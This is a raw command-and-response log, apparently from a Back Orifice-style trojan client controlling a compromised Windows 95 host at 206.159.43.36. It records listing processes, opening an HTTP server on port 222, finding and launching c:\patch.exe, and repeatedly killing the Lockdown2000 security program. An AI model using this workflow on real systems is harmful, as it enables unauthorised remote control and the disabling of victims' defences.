** 0:Ping host packet sent (19 bytes) val1: '' val2: '' ** 1:Ping host packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- !PONG!1.20!GEORGE! ------------------------- End of Data ------------------- ** 2:Process list packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- pid - Executable 4293906985 C:\WIN95\SYSTEM\KERNEL32.DLL 4294961749 C:\WIN95\SYSTEM\MSGSRV32.EXE 4294941401 C:\WIN95\SYSTEM\MPREXE.EXE 4294943105 C:\WIN95\SYSTEM\mmtask.tsk 4294946693 C:\WIN95\EXPLORER.EXE 4294443753 C:\WIN95\CDALLOC2.EXE 4294455137 C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\AVCONSOL.EXE 4294504473 C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSSTAT.EXE 4294501517 C:\PROGRAM FILES\LOCKDOWN2000\LOCKDOWN2000.EXE 4294479789 C:\WIN95\SYSTEM\SPOOL32.EXE 4294484641 C:\WIN95\SYSTEM\FINDME.EXE 4294525761 C:\PROGRAM FILES\MCAFEE\PC MEDIC 97\RXMENU.EXE 4294568113 c:\program files\mcafee\pc medic 97\rxctch16.exe 4294558293 C:\WIN95\SYSTEM\WPSPSW.EXE 4294510353 C:\PROGRAM FILES\FRONTPAGEEDITOR\FPEDITOR.EXE 4294627029 C:\PROGRAM FILES\NETSCAPE\NAVIGATOR\PROGRAM\NETSCAPE.EXE 4294640569 C:\WIN95\SYSTEM\RNAAPP.EXE 4294641509 C:\WIN95\SYSTEM\tapiexe.exe 4294509081 C:\WIN95\SYSTEM\WINOA386.MOD End of processes ------------------------- End of Data ------------------- ** 3:HTTP Enable packet sent (22 bytes) val1: '222' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- HTTP server listening on port 222 ------------------------- End of Data ------------------- ** 4:File find packet sent (31 bytes) val1: 'patch.exe' val2: 'c:\' ---------- Packet received from host 206.159.43.36 port 256 --------- Searching for file 'patch.exe' from root 'c:\': PATCH.EXE 0 -A----- 12-09-98 03:11 c:\patch.exe End of search ------------------------- End of Data ------------------- ** 5:File find packet sent (31 bytes) val1: 'patch.exe' val2: 'c:\' ---------- Packet received from host 206.159.43.36 port 256 --------- Searching for file 'patch.exe' from root 'c:\': PATCH.EXE 494592 -A----- 12-09-98 03:11 c:\patch.exe End of search ------------------------- End of Data ------------------- ** 6:Process spawn packet sent (31 bytes) val1: 'c:\patch.exe' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- 'c:\patch.exe' spawned successfully as process 4294673925 ------------------------- End of Data ------------------- ** 7:Process kill packet sent (29 bytes) val1: '4294501517' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- Process terminated ------------------------- End of Data ------------------- ** 8:Process list packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- pid - Executable 4293906985 C:\WIN95\SYSTEM\KERNEL32.DLL 4294961749 C:\WIN95\SYSTEM\MSGSRV32.EXE 4294941401 C:\WIN95\SYSTEM\MPREXE.EXE 4294943105 C:\WIN95\SYSTEM\mmtask.tsk 4294946693 C:\WIN95\EXPLORER.EXE 4294443753 C:\WIN95\CDALLOC2.EXE 4294455137 C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\AVCONSOL.EXE 4294504473 C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSSTAT.EXE 4294479789 C:\WIN95\SYSTEM\SPOOL32.EXE 4294484641 C:\WIN95\SYSTEM\FINDME.EXE 4294525761 C:\PROGRAM FILES\MCAFEE\PC MEDIC 97\RXMENU.EXE 4294568113 c:\program files\mcafee\pc medic 97\rxctch16.exe 4294558293 C:\WIN95\SYSTEM\WPSPSW.EXE 4294510353 C:\PROGRAM FILES\FRONTPAGEEDITOR\FPEDITOR.EXE 4294627029 C:\PROGRAM FILES\NETSCAPE\NAVIGATOR\PROGRAM\NETSCAPE.EXE 4294640569 C:\WIN95\SYSTEM\RNAAPP.EXE 4294641509 C:\WIN95\SYSTEM\tapiexe.exe 4294509081 C:\WIN95\SYSTEM\WINOA386.MOD 4294673925 C:\PATCH.EXE 4294542657 C:\WIN95\WINTOP.EXE End of processes ------------------------- End of Data ------------------- ** 9:Process kill packet sent (29 bytes) val1: '4294673925' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- Process terminated ------------------------- End of Data ------------------- ** 10:Process spawn packet sent (65 bytes) val1: 'c:\Program Files\Lockdown2000\Lockdown2000.exe' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- 'c:\Program Files\Lockdown2000\Lockdown2000.exe' spawned successfully as process 4294454905 ------------------------- End of Data ------------------- ** 11:Process spawn packet sent (31 bytes) val1: 'c:\patch.exe' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- 'c:\patch.exe' spawned successfully as process 4294455745 ------------------------- End of Data ------------------- ** 12:Process kill packet sent (29 bytes) val1: '4294454905' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- Process terminated ------------------------- End of Data ------------------- ** 13:Process spawn packet sent (65 bytes) val1: 'c:\Program Files\Lockdown2000\Lockdown2000.exe' val2: '' ---------- Packet received from host 206.159.43.36 port 256 --------- 'c:\Program Files\Lockdown2000\Lockdown2000.exe' spawned successfully as process 4294556241 ------------------------- End of Data -------------------